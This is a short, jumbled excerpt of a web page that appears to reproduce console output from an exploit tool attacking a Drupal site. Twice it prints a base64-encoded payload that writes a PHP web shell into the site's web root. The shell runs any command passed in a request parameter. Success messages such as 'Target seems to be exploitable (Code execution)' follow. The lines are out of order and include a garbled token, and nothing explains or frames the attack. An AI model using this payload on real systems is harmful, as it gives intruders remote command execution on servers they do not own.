Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/s.php Testing: Writing To Web Root (sites/default/) Target is NOT exploitable for some reason (HTTP Response: 404). If either you do not want to even try and write a PHP web shell to the web server, edit the file as shown (it will fall back if it can't find a writeable location anyway): Ubuntu140045圆4-drupal > Direct Commands / Non PHP Shell (aka File-Less Method) Very Good News Everyone ! Wrote to the web root ! Waayheeeey !!! Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee s.php Good News Everyone ! Target seems to be exploitable (Code execution) ! w00hooOO !
0 Comments
Leave a Reply. |